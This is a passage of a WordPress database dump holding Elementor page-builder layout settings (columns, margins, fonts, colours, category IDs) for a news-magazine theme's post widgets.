m\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1082,403,'_elementor_version','0.4'),(1084,404,'_elementor_edit_mode','builder'),(1085,404,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"pos